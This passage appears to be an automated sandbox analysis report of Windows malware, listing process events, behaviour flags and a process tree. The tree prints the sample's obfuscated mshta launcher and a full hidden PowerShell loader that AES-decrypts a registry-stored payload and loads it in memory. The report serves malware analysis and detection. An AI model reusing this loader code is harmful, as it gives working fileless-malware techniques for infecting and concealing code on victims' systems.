cmd.exe PING.EXE PID 1384 wrote to memory of 3124 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 3124 1384 cmd.exe PING.EXE PID 2812 wrote to memory of 3924 2812 cmd.exe uni.bat.exe PID 2812 wrote to memory of 3924 2812 cmd.exe uni.bat.exe PID 1384 wrote to memory of 4856 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 4856 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 2348 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2348 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4568 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 4568 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 4808 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4808 1384 cmd.exe PING.EXE PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 2888 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 3924 wrote to memory of 4344 3924 uni.bat.exe dllhost.exe PID 1384 wrote to memory of 3160 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 3160 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 3956 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 3956 1384 cmd.exe PING.EXE PID 3156 wrote to memory of 668 3156 $sxr-mshta.exe $sxr-cmd.exe PID 3156 wrote to memory of 668 3156 $sxr-mshta.exe $sxr-cmd.exe PID 668 wrote to memory of 1064 668 $sxr-cmd.exe $sxr-powershell.exe PID 668 wrote to memory of 1064 668 $sxr-cmd.exe $sxr-powershell.exe PID 1384 wrote to memory of 3116 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 3116 1384 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{13e79cba-8a92-4d0c-81c3-a2b5c0a4024e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5ca1758b-deb9-462e-8367-768cf7dde266}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e1f11d71-60ac-4809-96d0-b066f4867e5b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ffd5144c-da1e-4a02-9077-46fdd324c0cc}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a4035435-0671-42aa-928d-d639d53355c3}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b3afd662-1c33-4ec2-ae4d-f077a945226c}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cd993c8e-b9fb-46a5-b1bd-e754d3bf0206}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4576 -s 4003⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b284631b-6801-43c1-9a39-717aeaba006a}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{86bb4222-3e9a-4574-96a8-75d1d1167cfb}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{87bfd4c7-5286-45b3-b1d1-1b9e199a85eb}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1064).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63e95352-5532-4777-8303-3d53f15d13a5}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1cbe6018-a611-4b9e-af75-46c1900d6ad4}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ff42ffba-c7df-4638-bd6a-39b33077e05f}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 4566⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1d0919ff-34b1-4236-bbfb-d865c5735c02}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6f6de688-7914-43d8-a4db-a556ae9a9ae7}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{01675c55-0a5e-4376-b04a-d8f2d7810415}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 4606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c5f489c7-a407-4533-969c-b2dd5cba468c}5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
